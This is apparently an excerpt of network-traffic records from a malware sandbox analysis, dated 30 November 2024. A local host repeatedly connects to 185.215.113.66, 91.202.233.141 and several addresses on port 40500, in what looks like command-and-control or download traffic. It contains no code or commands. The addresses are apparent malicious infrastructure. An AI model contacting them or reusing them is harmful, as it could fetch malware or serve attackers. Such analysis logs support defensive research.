                                                                                                                  Nov 30, 2024 01:56:50.623681068 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.623696089 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.623744011 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.624628067 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.624669075 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.632003069 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.632065058 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.632103920 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.632148981 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.640410900 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.640470028 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.640526056 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.640583992 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.648813009 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.648859978 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.648910046 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.648955107 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.657244921 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.657298088 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.657388926 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.657454014 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.665608883 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.665667057 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.665730000 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.665771961 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.674006939 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.674061060 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.674108028 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.674151897 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.682408094 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.682466030 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.682507992 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.682552099 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.690824032 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.690881968 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.690929890 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.690975904 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.698472023 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.698544025 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.698558092 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.698602915 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:50.739603996 CET8049887185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:50.739653111 CET4988780192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:52.792757988 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:52.912786007 CET8049899185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:52.912885904 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:52.945116043 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:53.065174103 CET8049899185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:54.300734997 CET8049899185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:54.300803900 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:54.547736883 CET4990140500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:56:54.667699099 CET405004990189.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:54.667790890 CET4990140500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:56:54.668873072 CET4990140500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:56:54.765836954 CET4990140500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:56:54.788768053 CET405004990189.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:54.929477930 CET405004990189.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:55.541882992 CET4050049851102.215.170.62192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:55.541943073 CET4985140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:56:56.898098946 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:56.937664032 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:57.656661034 CET4984780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:57.656941891 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:57.776897907 CET804991191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:57.776911974 CET804984791.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:57.776976109 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:57.777013063 CET4984780192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:57.786437988 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:57.906335115 CET804991191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:59.115813017 CET804991191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:59.115895033 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:56:59.781994104 CET4991740500192.168.2.489.218.244.178
                                                                                                                  Nov 30, 2024 01:56:59.901940107 CET405004991789.218.244.178192.168.2.4
                                                                                                                  Nov 30, 2024 01:56:59.902019978 CET4991740500192.168.2.489.218.244.178
                                                                                                                  Nov 30, 2024 01:56:59.903037071 CET4991740500192.168.2.489.218.244.178
                                                                                                                  Nov 30, 2024 01:56:59.968940973 CET4991740500192.168.2.489.218.244.178
                                                                                                                  Nov 30, 2024 01:57:00.022903919 CET405004991789.218.244.178192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:00.129713058 CET405004991789.218.244.178192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:00.807519913 CET405004986391.231.253.155192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:00.807580948 CET4986340500192.168.2.491.231.253.155
                                                                                                                  Nov 30, 2024 01:57:01.329763889 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:01.330039978 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:01.449902058 CET804991891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:01.449987888 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:01.450135946 CET804991191.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:01.450186014 CET4991180192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:01.477612019 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:01.597501040 CET804991891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:02.821078062 CET804991891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:02.821150064 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:04.985471010 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:05.105586052 CET405004992980.71.213.158192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:05.105671883 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:05.107033014 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:05.226922035 CET405004992980.71.213.158192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:05.226991892 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:05.297194958 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:05.346949100 CET405004992980.71.213.158192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:05.457799911 CET405004992980.71.213.158192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:06.057811022 CET405004987559.91.192.115192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:06.057878971 CET4987540500192.168.2.459.91.192.115
                                                                                                                  Nov 30, 2024 01:57:06.828536987 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:06.828844070 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:06.925971985 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:06.948820114 CET804993091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:06.948884010 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:06.949068069 CET804991891.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:06.949119091 CET4991880192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:06.958869934 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:07.047087908 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:07.078797102 CET804993091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:08.358907938 CET804993091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:08.358968973 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.297911882 CET4994140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:57:10.399094105 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.399413109 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.418098927 CET4050049941102.215.170.62192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:10.418190956 CET4994140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:57:10.419496059 CET4994140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:57:10.422126055 CET4994140500192.168.2.4102.215.170.62
                                                                                                                  Nov 30, 2024 01:57:10.520684958 CET804994291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:10.520782948 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.521114111 CET804993091.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:10.521182060 CET4993080192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.531789064 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:10.540779114 CET4050049941102.215.170.62192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:10.585570097 CET4050049941102.215.170.62192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:10.651834965 CET804994291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:11.401822090 CET405004988887.237.234.195192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:11.402775049 CET4988840500192.168.2.487.237.234.195
                                                                                                                  Nov 30, 2024 01:57:11.851308107 CET804994291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:11.852788925 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:13.990552902 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:13.990864992 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:14.110728025 CET804994991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:14.110794067 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:14.110805988 CET804994291.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:14.110891104 CET4994280192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:14.165716887 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:14.285655975 CET804994991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:15.438452005 CET4995440500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:57:15.528466940 CET804994991.202.233.141192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:15.530793905 CET4994980192.168.2.491.202.233.141
                                                                                                                  Nov 30, 2024 01:57:15.558553934 CET405004995490.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:15.559061050 CET4995440500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:57:15.560338974 CET4995440500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:57:15.609693050 CET4995440500192.168.2.490.156.160.43
                                                                                                                  Nov 30, 2024 01:57:15.680263042 CET405004995490.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:15.773578882 CET405004995490.156.160.43192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:16.652009964 CET405004990189.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:16.652132034 CET4990140500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:16.885433912 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:16.937732935 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:18.799477100 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:18.799765110 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:18.919670105 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:18.919754982 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:18.919795036 CET8049899185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:18.919928074 CET4989980192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:18.937022924 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:19.057235956 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.251590967 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.251660109 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.251672029 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.251724958 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.251735926 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.251775980 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.252127886 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.252149105 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.252162933 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.252177954 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.252202034 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.252232075 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.252839088 CET8049961185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.252888918 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.263365030 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.263389111 CET4996180192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.626070976 CET4996740500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:20.746011972 CET405004996789.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.746098042 CET4996740500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:20.747406960 CET4996740500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:20.812808037 CET4996740500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:20.867379904 CET405004996789.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:20.973690033 CET405004996789.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:21.798881054 CET405004991789.218.244.178192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:21.798968077 CET4991740500192.168.2.489.218.244.178
                                                                                                                  Nov 30, 2024 01:57:22.434057951 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:22.554234982 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:22.554332018 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:22.585227966 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:22.705167055 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080219030 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080235958 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080249071 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080260038 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080272913 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080280066 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.080287933 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080319881 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.080353022 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.080491066 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080516100 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080528021 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.080559015 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.080573082 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.081212044 CET8049970185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:24.081259012 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.103795052 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.103827953 CET4997080192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:25.829339027 CET4998040500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:25.949261904 CET405004998089.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:25.949352026 CET4998040500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:25.950681925 CET4998040500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:26.047369003 CET4998040500192.168.2.489.249.62.92
                                                                                                                  Nov 30, 2024 01:57:26.070555925 CET405004998089.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:26.209645033 CET405004998089.249.62.92192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:26.355437040 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:26.475531101 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:26.475634098 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:26.501461983 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:26.621453047 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:26.886286974 CET515249838185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:26.937786102 CET498385152192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.104991913 CET405004992980.71.213.158192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.105070114 CET4992940500192.168.2.480.71.213.158
                                                                                                                  Nov 30, 2024 01:57:27.874023914 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.874104023 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.874144077 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.874155998 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.874195099 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.874378920 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.874388933 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.874428034 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.874970913 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.875016928 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.875107050 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.875123978 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.875147104 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.875164032 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.875399113 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.875412941 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.875447989 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.994117975 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.994198084 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.994285107 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.994338989 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.998260975 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:27.998312950 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:27.999995947 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.000047922 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.000077009 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.000121117 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.079829931 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.079844952 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.080147982 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.082155943 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.082222939 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.082262039 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.082309008 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.090707064 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.090785027 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.090785980 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.090831041 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.098963022 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.099030018 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.099071026 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.099122047 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.107359886 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.107418060 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.107511997 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.107563019 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.115750074 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.115802050 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.115842104 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.115896940 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.124232054 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.124269962 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.124315023 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.124356031 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.132602930 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.132690907 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.132713079 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.132771969 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.140227079 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.140285015 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.140372992 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.140427113 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.147875071 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.147923946 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.148000956 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.148046017 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.155544996 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.155594110 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.188743114 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.188787937 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.242969990 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.243016005 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.243072987 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.243168116 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.246778965 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.246818066 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.280864000 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.280921936 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.280961990 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.281006098 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.283284903 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.283334970 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.284216881 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.284259081 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.284332037 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.284368992 CET4998280192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:28.289355993 CET8049982185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:57:28.289408922 CET4998280192.168.2.4185.215.113.66
